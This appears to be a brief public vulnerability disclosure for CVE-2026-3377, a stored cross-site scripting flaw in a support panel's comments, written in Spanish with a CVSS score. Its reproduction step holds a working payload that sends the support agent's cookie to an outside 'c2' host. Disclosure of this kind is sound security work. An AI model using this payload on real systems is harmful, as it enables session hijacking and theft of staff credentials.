MediumCVE-2026-3377CWE-79A03:2021 Injection
XSS almacenado en comentarios del panel de soporte
Disclosure basisAlready public vulnerabilityCVE-2026-3377
Mesh Ferreyra@m3sh
0
Community vote6.1
Medium
CVSS 3.1 base score
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
// Executive summary
El cuerpo del comentario se renderiza sin sanitizar, permitiendo <code><img src=x onerror></code> que ejecuta en la sesión del agente de soporte.
// Reproduction steps
POST /support/comment
body=<img src=x onerror=fetch('//c2/'+document.cookie)>
# se ejecuta al abrir el ticket en el panel del agente
Comments
0